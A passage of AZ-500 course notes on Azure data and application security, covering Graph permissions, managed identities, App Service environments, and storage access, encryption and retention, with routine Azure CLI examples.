                            Effective permissions are the permissions that your app will have when making requests to Microsoft Graph. It is important to understand the difference between the delegated and application permissions that your app is granted and its effective permissions when making calls to Microsoft Graph.

                            For example, assume your app has been granted the User.ReadWrite.All delegated permission. This permission nominally grants your app permission to read and update the profile of every user in an organization. If the signed-in user is a global administrator, your app will be able to update the profile of every user in the organization. However, if the signed-in user is not in an administrator role, your app will be able to update only the profile of the signed-in user.
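
                            As a sketch, here is how a delegated Graph permission can be requested for an app with the Azure CLI. The app ID is a placeholder, 00000003-0000-0000-c000-000000000000 is the well-known Microsoft Graph application ID, and the GUID shown for User.Read is the commonly published permission ID (verify it in your tenant):

                            ```bash
                            # Request the delegated (Scope) User.Read permission on Microsoft Graph.
                            az ad app permission add \
                              --id <application-client-id> \
                              --api 00000003-0000-0000-c000-000000000000 \
                              --api-permissions e1fe6dd8-ba31-4d61-89e7-88639da4683d=Scope

                            # Delegated permissions still need user or admin consent at sign-in,
                            # or an admin can grant tenant-wide consent up front:
                            az ad app permission admin-consent --id <application-client-id>
                            ```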

                            Microsoft Graph Security API. The Microsoft Graph Security API is an intermediary service (or broker) that provides a single programmatic interface to connect multiple Microsoft Graph Security providers (also called security providers or providers). It federates requests to all providers in the Microsoft Graph Security ecosystem.

                            The following is a description of the flow:

                            1. The application user signs in to the provider application to view the consent form from the provider. This consent experience (UI) is owned by the provider and applies only to non-Microsoft providers, which must obtain explicit consent from their customers to send requests to the Microsoft Graph Security API.
                            2. The client consent is stored on the provider side.
                            3. The provider consent service calls the Microsoft Graph Security API to inform consent approval for the respective customer.
                            4. The application sends a request to the Microsoft Graph Security API.
                            5. The Microsoft Graph Security API checks for the consent information for this customer mapped to various providers.
                            6. The Microsoft Graph Security API calls all those providers the customer has given explicit consent to via the provider consent experience.
                            7. The response is returned from all the consented providers for that client.
                            8. The result set response is returned to the application.
                            9. If the customer has not consented to any provider, no results from those providers are included in the response.

                            Why use the Microsoft Graph Security API?

                            • Write code – Find code samples in C#, Java, NodeJS, and more.
                            • Connect using scripts – Find PowerShell samples.
                            • Drag and drop into workflows and playbooks – Use Microsoft Graph Security connectors for Azure Logic Apps, Microsoft Flow, and PowerApps.
                            • Get data into reports and dashboards – Use the Microsoft Graph Security connector for Power BI.
                            • Connect using Jupyter notebooks – Find Jupyter notebook samples.
                            • Unify and standardize alert tracking: Connect once to integrate alerts from any Microsoft Graph-integrated security solution and keep alert status and assignments in sync across all solutions. You can also stream alerts to security information and event management (SIEM) solutions, such as Splunk using Microsoft Graph Security API connectors.
                            • Correlate security alerts to improve threat protection and response: Correlate alerts across security solutions more easily with a unified alert schema.
                            • Update alert tags, status, and assignments: Tag alerts with additional context or threat intelligence to inform response and remediation. Ensure that comments and feedback on alerts are captured for visibility to all workflows. Keep alert status and assignments in sync so that all integrated solutions reflect the current state. Use webhook subscriptions to get notified of changes.
                            • Unlock security context to drive investigation: Dive deep into related security-relevant inventory (like users, hosts, and apps), then add organizational context from other Microsoft Graph providers (Microsoft Entra ID, Microsoft Intune, Microsoft 365) to bring business and security contexts together and improve threat response.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#24-enable-managed-identities","title":"2.4. Enable managed identities","text":"

                            Managed identities for Azure resources is the new name for the service formerly known as Managed Service Identity (MSI). This Microsoft Entra feature provides Azure services with an automatically managed identity in Microsoft Entra ID. You can use the identity to authenticate to any service that supports Microsoft Entra authentication, including Key Vault, without any credentials in your code. The managed identities for Azure resources feature is free with Microsoft Entra ID for Azure subscriptions. There's no additional cost.

                            Terminology. The following terms are used throughout the managed identities for Azure resources documentation set:

                            • Client ID - a unique identifier generated by Microsoft Entra ID that is tied to an application and service principal during its initial provisioning.
                            • Principal ID - the object ID of the service principal object for your managed identity that is used to grant role-based access to an Azure resource.
                            • Azure Instance Metadata Service (IMDS) - a REST endpoint accessible to all IaaS VMs created via the Azure Resource Manager. The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from within the VM.

                            How managed identities for Azure resources work. There are two types of managed identities:

                            • A system-assigned managed identity is enabled directly on an Azure service instance. When the identity is enabled, Azure creates an identity for the instance in the Microsoft Entra tenant that's trusted by the subscription of the instance. After the identity is created, the credentials are provisioned onto the instance. The lifecycle of a system-assigned identity is directly tied to the Azure service instance that it's enabled on. If the instance is deleted, Azure automatically cleans up the credentials and the identity in Microsoft Entra ID.
                            • A user-assigned managed identity is created as a standalone Azure resource. Through a create process, Azure creates an identity in the Microsoft Entra tenant that's trusted by the subscription in use. After the identity is created, the identity can be assigned to one or more Azure service instances. The lifecycle of a user-assigned identity is managed separately from the lifecycle of the Azure service instances to which it's assigned.

                            The following table shows the differences between the two types of managed identities:

                            | Property | System-assigned managed identity | User-assigned managed identity |
                            |---|---|---|
                            | Creation | Created as part of an Azure resource (for example, Azure Virtual Machines or Azure App Service). | Created as a stand-alone Azure resource. |
                            | Life cycle | Shared life cycle with the Azure resource that the managed identity is created with. When the parent resource is deleted, the managed identity is deleted as well. | Independent life cycle. Must be explicitly deleted. |
                            | Sharing across Azure resources | Can't be shared. It can only be associated with a single Azure resource. | Can be shared. The same user-assigned managed identity can be associated with more than one Azure resource. |
                            | Common use cases | Workloads contained within a single Azure resource. Workloads needing independent identities. For example, an application that runs on a single virtual machine. | Workloads that run on multiple resources and can share a single identity. Workloads needing pre-authorization to a secure resource, as part of a provisioning flow. Workloads where resources are recycled frequently, but permissions should stay consistent. For example, a workload where multiple virtual machines need to access the same resource. |

                            Credential rotation. Credential rotation is controlled by the resource provider that hosts the Azure resource. The default rotation of the credential occurs every 46 days. It's up to the resource provider to call for new credentials, so the resource provider could wait longer than 46 days. The following diagram shows how managed service identities work with Azure virtual machines (VMs):

                            1. Azure Resource Manager receives a request to enable the system-assigned managed identity on a VM.
                            2. Azure Resource Manager creates a service principal in Microsoft Entra ID for the identity of the VM. The service principal is created in the Microsoft Entra tenant that's trusted by the subscription.
                            3. Azure Resource Manager configures the identity on the VM by updating the Azure Instance Metadata Service identity endpoint with the service principal client ID and certificate.
                            4. After the VM has an identity, use the service principal information to grant the VM access to Azure resources. To call Azure Resource Manager, use role-based access control (RBAC) in Microsoft Entra ID to assign the appropriate role to the VM service principal. To call Key Vault, grant your code access to the specific secret or key in Key Vault.
                            5. Your code that's running on the VM can request a token from the Azure Instance Metadata Service endpoint, accessible only from within the VM: http://169.254.169.254/metadata/identity/oauth2/token (see the sketch after this list).
                              • The resource parameter specifies the service to which the token is sent. To authenticate to Azure Resource Manager, use resource=https://management.azure.com/.
                              • The api-version parameter specifies the IMDS version; use api-version=2018-02-01 or greater.
                            6. A call is made to Microsoft Entra ID to request an access token (as specified in step 5) by using the client ID and certificate configured in step 3. Microsoft Entra ID returns a JSON Web Token (JWT) access token.
                            7. Your code sends the access token on a call to a service that supports Microsoft Entra authentication.
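
                            A sketch of steps 1 and 5, assuming a hypothetical resource group and VM name:

                            ```bash
                            # Enable the system-assigned managed identity on an existing VM (step 1).
                            az vm identity assign --resource-group <rg> --name <vm-name>

                            # From inside the VM, request a token for Azure Resource Manager (step 5).
                            # The Metadata header is mandatory; the endpoint is only reachable
                            # from within the VM itself.
                            curl -s -H "Metadata: true" \
                              "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F"
                            ```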
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#25-azure-app-services","title":"2.5. Azure App Services","text":"

                            Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile backends. You can develop in your favorite language, be it .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python. Applications run and scale with ease on both Windows and Linux-based environments. Azure App Service is a fully managed platform as a service (PaaS) offering for developers. Here are some key features of App Service:

                            • Multiple languages and frameworks - App Service has first-class support for ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can also run PowerShell and other scripts or executables as background services.
                            • Managed production environment - App Service automatically patches and maintains the OS and language frameworks for you.
                            • Containerization and Docker - Dockerize your app and host a custom Windows or Linux container in App Service. Run multi-container apps with Docker Compose.
                            • DevOps optimization - Set up continuous integration and deployment with Azure DevOps, GitHub, BitBucket, Docker Hub, or Azure Container Registry.
                            • Global scale with high availability - Scale up or out manually or automatically.
                            • Connections to SaaS platforms and on-premises data - Choose from more than 50 connectors for enterprise systems (such as SAP), SaaS services (such as Salesforce), and internet services (such as Facebook). Access on-premises data using Hybrid Connections and Azure Virtual Networks.
                            • Security and compliance - The App Service is ISO, SOC, and PCI compliant. Authenticate users with Microsoft Entra ID, Google, Facebook, Twitter, or Microsoft account. Create IP address restrictions and manage service identities. Prevent subdomain takeovers.
                            • Application templates - Choose from an extensive list of application templates in the Azure Marketplace, such as WordPress, Joomla, and Drupal.
                            • Visual Studio and Visual Studio Code integration - Dedicated tools in Visual Studio and Visual Studio Code streamline the work of creating, deploying, and debugging.
                            • API and mobile features - App Service provides turn-key CORS support for RESTful API scenarios and simplifies mobile app scenarios by enabling authentication, offline data sync, push notifications, and more.
                            • Serverless code - Run a code snippet or script on-demand without having to explicitly provision or manage infrastructure and pay only for the compute time your code actually uses.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#26-app-service-environment","title":"2.6. App Service Environment","text":"

                            An App Service Environment is an Azure App Service feature that provides a fully isolated and dedicated environment for running App Service apps securely at high scale. An App Service Environment can host:

                            • Windows web apps
                            • Linux web apps
                            • Docker containers (Windows and Linux)
                            • Functions
                            • Logic apps (Standard)

                            App Service Environments have many use cases, including:

                            • Internal line-of-business applications.
                            • Applications that need more than 30 App Service plan instances.
                            • Single-tenant systems to satisfy internal compliance or security requirements.
                            • Network-isolated application hosting.
                            • Multi-tier applications.

                            There are many networking features that enable apps in a multi-tenant App Service to reach network-isolated resources or become network-isolated themselves. These features are enabled at the application level. With an App Service Environment, no added configuration is required for the apps to be on a virtual network. The apps are deployed into a network-isolated environment that's already on a virtual network. If you really need a complete isolation story, you can also deploy your App Service Environment onto dedicated hardware.

                            Dedicated environment. An App Service Environment is a single-tenant deployment of Azure App Service that runs on your virtual network:

                            • Applications are hosted in App Service plans (which are a provisioning profile for an application host).
                            • App Service plans are created in an App Service Environment.

                            When you scale out an App Service plan, you create more application hosts, with all the apps in that App Service plan running on each host.

                            • A single App Service Environment v3 can have up to 200 total App Service plan instances across all the App Service plans combined.
                            • A single App Service Isolated v2 (Iv2) plan can have up to 100 instances by itself.
                            • When you're deploying onto dedicated hardware (hosts), you're limited in scaling across all App Service plans to the number of cores in this type of environment. An App Service Environment that's deployed on dedicated hosts has 132 vCores available. I1v2 uses two vCores, I2v2 uses four vCores, and I3v2 uses eight vCores per instance.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#27-azure-app-service-plan","title":"2.7. Azure App Service plan","text":"

                            An app service always runs in an App Service plan. In addition, Azure Functions also has the option of running in an App Service plan. An App Service plan defines a set of compute resources for a web app to run. These compute resources are analogous to the server farm in conventional web hosting. One or more apps can be configured to run on the same computing resources (or in the same App Service plan).

                            Each App Service plan defines:

                            • Operating System (Windows, Linux)
                            • Region (West US, East US, etc.)
                            • Number of VM instances
                            • Size of VM instances (Small, Medium, Large)
                            • Pricing tier (Free, Shared, Basic, Standard, Premium, PremiumV2, PremiumV3, Isolated, IsolatedV2). This determines what App Service features you get and how much you pay for the plan.

                            When you create an App Service plan in a certain region (for example, West Europe), a set of compute resources is created for that plan in that region. Whatever apps you put into this App Service plan run on these compute resources as defined by your App Service plan.

                            The pricing tiers available to your App Service plan depend on the operating system selected at creation time. There are a few categories of pricing tiers:

                            • Shared compute: Free and Shared, the two base tiers, run an app on the same Azure VM as other App Service apps, including apps of other customers. These tiers allocate CPU quotas to each app that runs on the shared resources, and the resources cannot scale out.
                            • Dedicated compute: The Basic, Standard, Premium, PremiumV2, and PremiumV3 tiers run apps on dedicated Azure VMs. Only apps in the same App Service plan share the same compute resources. The higher the tier, the more VM instances are available to you for scale-out.
                            • Isolated: The Isolated and IsolatedV2 tiers run dedicated Azure VMs on dedicated Azure Virtual Networks. They provide network isolation on top of compute isolation, along with the maximum scale-out capabilities.
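
                            A minimal sketch of creating a plan and a web app in it with the Azure CLI; all names are hypothetical, and the runtime string may differ across CLI versions and regions:

                            ```bash
                            # Create a Linux App Service plan in the Premium V3 tier.
                            az appservice plan create \
                              --name demo-plan \
                              --resource-group demo-rg \
                              --is-linux \
                              --sku P1V3

                            # Create a web app inside that plan.
                            az webapp create \
                              --name demo-web-app-12345 \
                              --resource-group demo-rg \
                              --plan demo-plan \
                              --runtime "NODE:18-lts"
                            ```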
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#28-app-service-environment-networking","title":"2.8. App Service Environment networking","text":"

                            App Service Environment is a single-tenant deployment of Azure App Service that hosts Windows and Linux containers, web apps, API apps, logic apps, and function apps. When you install an App Service Environment, you pick the Azure virtual network that you want it to be deployed in. All of the inbound and outbound application traffic is inside the virtual network you specify. You deploy into a single subnet in your virtual network, and nothing else can be deployed into that subnet.

                            Subnet requirements. You must delegate the subnet to Microsoft.Web/hostingEnvironments, and the subnet must be empty. The size of the subnet can affect the scaling limits of the App Service plan instances within the App Service Environment. It's a good idea to use a /24 address space (256 addresses) for your subnet to ensure enough addresses to support production scale.

                            Windows Containers use an additional IP address per app for each App Service plan instance, and you need to size the subnet accordingly. If your App Service Environment has, for example, 2 Windows Container App Service plans, each with 25 instances and each with 5 apps running, you will need 300 IP addresses, plus additional addresses to support horizontal scaling.

                            The minimum size of your subnet is a /27 address space (32 addresses). Any particular subnet has five addresses reserved for management purposes. In addition to the management addresses, App Service Environment dynamically scales the supporting infrastructure and uses between 4 and 27 addresses, depending on the configuration and load. You can use the remaining addresses for instances in the App Service plan.

                            If you run out of addresses within your subnet, you can be restricted from scaling out your App Service plans in the App Service Environment. Another possibility is that you can experience increased latency during intensive traffic load if Microsoft can't scale the supporting infrastructure.
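
                            A sketch of delegating an empty subnet to App Service Environments as required above, assuming a hypothetical virtual network:

                            ```bash
                            # Delegate the (empty) subnet to Microsoft.Web/hostingEnvironments.
                            az network vnet subnet update \
                              --resource-group demo-rg \
                              --vnet-name demo-vnet \
                              --name ase-subnet \
                              --delegations Microsoft.Web/hostingEnvironments
                            ```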

                            App Service Environment has the following network information at creation:

                            | Address type | Description |
                            |---|---|
                            | App Service Environment virtual network | The virtual network deployed into. |
                            | App Service Environment subnet | The subnet deployed into. |
                            | Domain suffix | The domain suffix that is used by the apps made. |
                            | Virtual IP (VIP) | The VIP type used. The two possible values are internal and external. |
                            | Inbound address | The inbound address is the address at which your apps are reached. If you have an internal VIP, it's an address in your App Service Environment subnet. If the address is external, it's a public-facing address. |
                            | Default outbound addresses | The apps use this address, by default, when making outbound calls to the internet. |

                            As you scale your App Service plans in your App Service Environment, you'll use more addresses from your subnet. Apps in the App Service Environment don't have dedicated addresses in the subnet. The specific addresses an app uses in the subnet will change over time.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#29-availability-zone-support-for-app-service-environments","title":"2.9. Availability Zone Support for App Service Environments","text":"

                            Azure App Service Environment can be deployed across availability zones (AZ) to help you achieve resiliency and reliability for your business-critical workloads. This architecture is also known as zone redundancy.

                            When you configure it to be zone redundant, the platform automatically spreads the instances of the Azure App Service plan across three zones in the selected region. This means that the minimum App Service plan instance count will always be three. If you specify a capacity larger than three, and the number of instances is divisible by three, the instances are spread evenly. Otherwise, instance counts beyond 3*N are spread across the remaining one or two zones.

                            • You configure availability zones when you create your App Service Environment.
                            • You can only specify availability zones when creating a new App Service Environment, not later.
                            • Availability zones are\u00a0only supported in a subset of regions.

                            Since you can't convert pre-existing App Service Environments to use availability zones, migration will consist of a side-by-side deployment where you'll create a new App Service Environment with availability zones enabled. For more information on App Service Environment migration options, see App Service Environment migration.
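
                            A sketch of creating a new zone-redundant App Service Environment (v3); the names are placeholders, and the --zone-redundant flag is an assumption to verify against your CLI version (az appservice ase create --help):

                            ```bash
                            # Create an App Service Environment v3 spread across availability zones.
                            az appservice ase create \
                              --name demo-ase \
                              --resource-group demo-rg \
                              --vnet-name demo-vnet \
                              --subnet ase-subnet \
                              --zone-redundant
                            ```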

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#210-app-service-environment-certificates","title":"2.10. App Service Environment Certificates","text":"

                            Azure App Service provides a highly scalable, self-patching web hosting service. Once the certificate is added to your App Service app or function app, you can secure a custom Domain Name System (DNS) name with it or use it in your application code.

                            A certificate uploaded into an app is stored in a deployment unit that is bound to the app service plan's resource group and region combination (internally called a webspace). This makes the certificate accessible to other apps in the same resource group and region combination.

                            The following lists are options for adding certificates in App Service:

                            • Create a free App Service managed certificate: A private certificate that's free of charge and easy to use if you just need to secure your custom domain in App Service.
                            • Purchase an App Service certificate: A private certificate that's managed by Azure. It combines the simplicity of automated certificate management and the flexibility of renewal and export options.
                            • Import a certificate from Key Vault: Useful if you use Azure Key Vault to manage your\u00a0Public-Key Cryptography Standards #12 (PKCS12)\u00a0certificates.
                            • Upload a private certificate: If you already have a private certificate from a third-party provider, you can upload it.
                            • Upload a public certificate: Public certificates are not used to secure custom domains, but you can load them into your code if you need them to access remote resources.
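
                            For the Key Vault option, a sketch of importing a certificate into an app. The app and vault names are hypothetical; check az webapp config ssl import --help for the exact parameters in your CLI version:

                            ```bash
                            # Import a Key Vault certificate into an App Service app.
                            az webapp config ssl import \
                              --resource-group demo-rg \
                              --name demo-web-app-12345 \
                              --key-vault demo-kv \
                              --key-vault-certificate-name demo-cert
                            ```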

                            **Prerequisites:**

                            • Create an App Service app.
                            • For a private certificate, make sure that it satisfies all requirements from App Service.
                            • Free certificate only:
                              • Map the domain you want a certificate for to App Service.
                              • For a root domain (like contoso.com), make sure your app doesn't have any IP restrictions configured. Both certificate creation and its periodic renewal for a root domain depends on your app being reachable from the internet.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#3-storage-security","title":"3. Storage Security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#31-data-sovereignty","title":"3.1. Data sovereignty","text":"

                            Data sovereignty is the concept that information, which has been converted and stored in binary digital form, is subject to the laws of the country or region in which it is located. We recommend that you configure business continuity and disaster recovery (BCDR) across regional pairs to benefit from Azure's isolation and VM policies.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#32-configure-azure-storage-access","title":"3.2. Configure Azure storage access","text":"

                            Options for authorizing requests to Azure Storage include:

                            • Microsoft Entra ID - Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. When you use Microsoft Entra ID to authorize requests made from your applications, you avoid having to store your account access key with your code, as you do with Shared Key authorization. While you can continue to use Shared Key authorization with your blob and queue applications, Microsoft recommends moving to Microsoft Entra ID where possible.
                            • Microsoft Entra Domain Services authorization for Azure Files - Azure Files supports identity-based authorization over Server Message Block (SMB) through Microsoft Entra Domain Services. You can use RBAC for fine-grained control over a client's access to Azure Files resources in a storage account.
                            • Shared Key - Shared Key authorization relies on your account access keys and other parameters to produce an encrypted signature string that is passed on the request in the Authorization header.
                            • Shared Access Signatures - A shared access signature (SAS) is a URI that grants restricted access rights to Azure Storage resources. You can provide a shared access signature to clients who should not be trusted with your storage account key but to whom you wish to delegate access to certain storage account resources. By distributing a shared access signature URI to these clients, you can grant them access to a resource for a specified period of time, with a specified set of permissions. The URI query parameters comprising the SAS token incorporate all of the information necessary to grant controlled access to a storage resource. A client who is in possession of the SAS can make a request against Azure Storage with just the SAS URI, and the information contained in the SAS token is used to authorize the request.
                            • Anonymous access to containers and blobs - You can enable anonymous, public read access to a container and its blobs in Azure Blob storage. By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature (SAS). A sketch of enabling this follows the list.
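
                            A sketch of enabling anonymous read access on a single container, assuming a hypothetical account and container (the storage account itself must also allow public access):

                            ```bash
                            # Allow anonymous read access to blobs in one container.
                            az storage container set-permission \
                              --account-name demostorageacct \
                              --name public-docs \
                              --public-access blob
                            ```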
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#33-deploy-shared-access-signatures","title":"3.3. Deploy shared access signatures","text":"

                            As a best practice, you shouldn't share storage account keys with external third-party applications. For untrusted clients, use a shared access signature (SAS).

                            A shared access signature is a string that contains a security token that can be attached to a URI. Use a shared access signature to delegate access to storage objects and specify constraints, such as the permissions and the time range of access.

                            • Service-level shared access signature: allows access to specific resources in a storage account. You'd use this type of shared access signature, for example, to allow an app to retrieve a list of files in a file system or to download a file. It is used to delegate access to a resource in either Blob storage, Queue storage, Table storage, or Azure Files.
                            • Account-level shared access signature: allows access to anything that a service-level shared access signature can allow, plus additional resources and abilities. For example, you can use an account-level shared access signature to allow the ability to create file systems.
                            • User delegation SAS: introduced with version 2018-11-09, secured with Microsoft Entra credentials. This type of SAS is supported for the Blob service only and can be used to grant access to containers and blobs.

                            One would typically use a shared access signature for a service where users read and write their data to your storage account. Accounts that store user data have two typical designs:

                            • Clients upload and download data through a front-end proxy service, which performs authentication. This front-end proxy service has the advantage of allowing validation of business rules. But if the service must handle large amounts of data or high-volume transactions, you might find it complicated or expensive to scale this service to match demand.

                            • A lightweight service authenticates the client as needed. Then it generates a shared access signature. After receiving the shared access signature, the client can access storage account resources directly. The shared access signature defines the client's permissions and access interval. The shared access signature reduces the need to route all data through the front-end proxy service.
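
                            A sketch of the lightweight-service pattern: generate a short-lived, read-only service SAS for one blob. Account, container, blob name, and expiry are placeholders:

                            ```bash
                            # Generate a read-only SAS token for a single blob, HTTPS only.
                            az storage blob generate-sas \
                              --account-name demostorageacct \
                              --container-name docs \
                              --name report.pdf \
                              --permissions r \
                              --expiry 2025-01-01T00:00Z \
                              --https-only \
                              --output tsv

                            # The client appends the returned token to the blob URL:
                            # https://demostorageacct.blob.core.windows.net/docs/report.pdf?<sas-token>
                            ```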

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#34-manage-microsoft-entra-storage-authentication","title":"3.4. Manage Microsoft Entra storage authentication","text":"

                            Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. With Microsoft Entra ID, you can use Azure role-based access control (Azure RBAC) to grant permissions to a security principal, which may be a user, group, or application service principal. The security principal is authenticated by Microsoft Entra ID to return an OAuth 2.0 token. The token can then be used to authorize a request against the Blob service.

                            Authorization with Microsoft Entra ID is available for all general-purpose and Blob storage accounts in all public regions and national clouds. Only storage accounts created with the Azure Resource Manager deployment model support Microsoft Entra authorization. Blob storage additionally supports creating shared access signatures (SAS) that are signed with Microsoft Entra credentials.

                            When a security principal (a user, group, or application) attempts to access a queue resource, the request must be authorized. With Microsoft Entra ID, access to a resource is a two-step process. First, the security principal's identity is authenticated, and an OAuth 2.0 token is returned. Next, the token is passed as part of a request to the Queue service and used by the service to authorize access to the specified resource. The authentication step requires that an application request an OAuth 2.0 access token at runtime. If an application is running from within an Azure entity, such as an Azure VM, a Virtual Machine Scale Set, or an Azure Functions app, it can use a managed identity to access queues.

                            The authorization step requires one or more Azure roles to be assigned to the security principal. Native and web applications that request the Azure Queue service can also authorize access with Microsoft Entra ID.
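
                            A sketch of the authorization step: assigning a built-in data-plane role to a security principal at storage-account scope. The principal ID and resource IDs are placeholders:

                            ```bash
                            # Grant a security principal read access to blob data in one account.
                            az role assignment create \
                              --assignee <principal-object-id> \
                              --role "Storage Blob Data Reader" \
                              --scope "/subscriptions/<sub-id>/resourceGroups/demo-rg/providers/Microsoft.Storage/storageAccounts/demostorageacct"
                            ```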

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#35-implement-storage-service-encryption","title":"3.5. Implement storage service encryption","text":"
                            • All data (including metadata) written to Azure Storage is automatically encrypted using Storage Service Encryption (SSE).
                            • Microsoft Entra ID and Role-Based Access Control (RBAC) are supported for Azure Storage for both resource management operations and data operations, as follows:
                              • You can assign RBAC roles scoped to the storage account to security principals and use Microsoft Entra ID to authorize resource management operations such as key management.
                              • Microsoft Entra integration is supported for blob and queue data operations. You can assign RBAC roles scoped to a subscription, resource group, storage account, or an individual container or queue to a security principal or a managed identity for Azure resources.
                            • Data can be secured in transit between an application and Azure by using Client-Side Encryption, HTTPS, or SMB 3.0.
                            • OS and data disks used by Azure virtual machines can be encrypted using Azure Disk Encryption.
                            • Delegated access to the data objects in Azure Storage can be granted using a shared access signature.

                            Azure Storage Service Encryption (SSE) for data at rest:

                            • When a new storage account is provisioned, Azure Storage Encryption is automatically enabled for it and it cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted.
                            • Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant.
                            • Azure Storage encryption is similar to BitLocker encryption on Windows.
                            • Encryption does not affect Azure Storage performance. There is no additional cost for Azure Storage encryption.

                            Encryption key management

                            You can rely on Microsoft-managed keys for the encryption of your storage account, or you can manage encryption with your own keys. If you choose to manage encryption with your own keys, you have two options:

                            • You can specify a customer-managed key to use for encrypting and decrypting all data in the storage account. A customer-managed key is used to encrypt all data in all services in your storage account.
                            • You can specify a customer-provided key on Blob storage operations. A client making a read or write request against Blob storage can include an encryption key on the request for granular control over how blob data is encrypted and decrypted.

                            The following table compares key management options for Azure Storage encryption.

                            | | Microsoft-managed keys | Customer-managed keys | Customer-provided keys |
                            |---|---|---|---|
                            | Encryption/decryption operations | Azure | Azure | Azure |
                            | Azure Storage services supported | All | Blob storage, Azure Files | Blob storage |
                            | Key storage | Microsoft key store | Azure Key Vault | Azure Key Vault or any other key store |
                            | Key rotation responsibility | Microsoft | Customer | Customer |
                            | Key usage | Microsoft | Azure portal, Storage Resource Provider REST API, Azure Storage management libraries, PowerShell, CLI | Azure Storage REST API (Blob storage), Azure Storage client libraries |
                            | Key access | Microsoft only | Microsoft, Customer | Customer only |
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#36-configure-blob-data-retention-policies","title":"3.6. Configure blob data retention policies","text":"

                            Immutable storage in Azure Blob storage:

                            Immutable storage for Azure Blob storage enables users to store business-critical data objects in a WORM (Write Once, Read Many) state. Immutable storage is available for general-purpose v2 and Blob storage accounts in all Azure regions.

                            Time-based retention policy support: Users can set policies to store data for a specified interval. When a time-based retention policy is set, blobs can be created and read, but not modified or deleted. After the retention period has expired, blobs can be deleted but not overwritten. When a time-based retention policy is applied on a container, all blobs in the container will stay in the immutable state for the duration of the effective retention period. The effective retention period for blobs is equal to the difference between the blob's creation time and the user-specified retention interval. Because users can extend the retention interval, immutable storage uses the most recent value of the user-specified retention interval to calculate the effective retention period.

                            Legal hold policy support: If the retention interval is not known, users can set legal holds to store immutable data until the legal hold is cleared. When a legal hold policy is set, blobs can be created and read, but not modified or deleted. Each legal hold is associated with a user-defined alphanumeric tag (such as a case ID, event name, etc.) that is used as an identifier string. Legal holds are temporary holds that can be used for legal investigation purposes or general protection policies. Each legal hold policy needs to be associated with one or more tags. Tags are used as a named identifier, such as a case ID or event, to categorize and describe the purpose of the hold.

                            Support for all blob tiers: WORM policies are independent of the Azure Blob storage tier and apply to all the tiers: hot, cool, and archive. Users can transition data to the most cost-optimized tier for their workloads while maintaining data immutability.

                            Container-level configuration: Users can configure time-based retention policies and legal hold tags at the container level. By using simple container-level settings, users can create and lock time-based retention policies, extend retention intervals, set and clear legal holds, and more. These policies apply to all the blobs in the container, both existing and new.

                            Audit logging support: Each container includes a policy audit log. It shows up to seven time-based retention commands for locked time-based retention policies and contains the user ID, command type, time stamps, and retention interval. For legal holds, the log contains the user ID, command type, time stamps, and legal hold tags. This log is retained for the lifetime of the policy, in accordance with the SEC 17a-4(f) regulatory guidelines. The Azure Activity Log shows a more comprehensive log of all the control plane activities; while enabling Azure Resource Logs retains and shows data plane operations. It is the user's responsibility to store those logs persistently, as might be required for regulatory or other purposes.

                            A container can have both a legal hold and a time-based retention policy at the same time. All blobs in that container stay in the immutable state until all legal holds are cleared, even if their effective retention period has expired. Conversely, a blob stays in an immutable state until the effective retention period expires, even if all legal holds have been cleared.
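
                            A sketch of both policy types at container level, assuming hypothetical account and container names (see az storage container immutability-policy --help for the full lock/extend workflow):

                            ```bash
                            # Time-based retention: keep blobs immutable for 30 days after creation.
                            az storage container immutability-policy create \
                              --account-name demostorageacct \
                              --container-name audit-logs \
                              --period 30

                            # Legal hold: keep blobs immutable until the tagged hold is cleared.
                            # Legal hold tags are short alphanumeric identifiers.
                            az storage container legal-hold set \
                              --account-name demostorageacct \
                              --container-name audit-logs \
                              --tags case2024001
                            ```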

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#37-storage-account-keys","title":"3.7. Storage Account Keys","text":"

                            Storage account keys are generated by Azure when the storage account is created. Azure generates two 512-bit keys. You use these keys to authorize access to data that resides in your storage account via Shared Key authorization. Azure Key Vault simplifies this process and allows you to rotate keys without interrupting your applications.
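
                            A sketch of listing and rotating the two keys with the Azure CLI; the account name is a placeholder:

                            ```bash
                            # List the two 512-bit account keys.
                            az storage account keys list \
                              --resource-group demo-rg \
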